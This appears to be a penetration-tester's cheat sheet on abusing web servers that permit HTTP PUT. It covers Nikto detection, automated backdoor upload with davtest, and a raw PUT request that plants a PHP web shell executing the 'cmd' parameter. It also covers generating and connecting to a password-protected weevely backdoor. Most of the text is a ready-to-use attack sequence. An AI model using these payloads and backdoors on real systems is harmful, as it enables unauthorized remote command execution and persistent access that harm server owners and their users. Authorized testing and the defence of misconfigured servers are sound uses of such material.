Abusing HTTP PUT

Detection of vulnerability

Run Nikto:

nikto --host <target ip>:<target port>

If it returns

+ OSVDB-397: HTTP method 'PUT' allows clients to save files on the web server.

You are potentially in business.

Some options for exploitation:

Try to get a backdoor with davtest

davtest -url http://<target ip>:target port> -sendbd auto -cleanup

This will test all possible payloads it has, send backdoors and clean up after itself afterwards.

Try a basic php backdoor with Burp

Capture a request, and send it to repeater. Change the method to PUT and add some php code to the bottom of the request. It should look roughly like this:

PUT /test.php HTTP/1.1
Host: <target ip>:<target port>
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
If-Modified-Since: Fri, 17 Feb 2017 22:27:30 GMT
If-None-Match: "18518f6-5a9-548c16b5e72ae"
Cache-Control: max-age=0
Content-Length: 50

<?php
echo exec($_GET[cmd]);
?>

Once this is up, navigate to the page and try to run commands like so:

http://<target ip>:<target port>/test.php?cmd=whoami

Create a backdoor with weevely and upload it with poster

Start by downloading the poster addon for firefox.

Next, spawn a backdoor with weevely:

weevely generate evil /root/back.php

This will output back.php with the password evil.

Go ahead and upload this shell using the PUT method with Poster by setting the following fields:

URL: http://<target ip>:<target port>/back.php
File: <location of back.php>

and then clicking the PUT button.

Now access the backdoor like so:

weevely http://<target ip>:<target port>/back.php evil

Cleanup

Once you're done, delete the backdoor using the DELETE method with Poster (specify DELETE in the dropdown and click the green button). Alternatively, since you'll probably have gotten a shell to the system at this point, you can rm it as well.

Resources

https://www.youtube.com/watch?v=vjatR1BKHO8
https://www.youtube.com/watch?v=Pb6Nd7Cl5XM&t=82s
https://www.youtube.com/watch?v=mgXWZVJ47qU
https://www.sans.org/reading-room/whitepapers/testing/penetration-testing-web-application-dangerous-http-methods-33945
http://www.smeegesec.com/2014/10/detecting-and-exploiting-http-put-method.html
http://niiconsulting.com/checkmate/2014/04/owning-enterprise-http-put/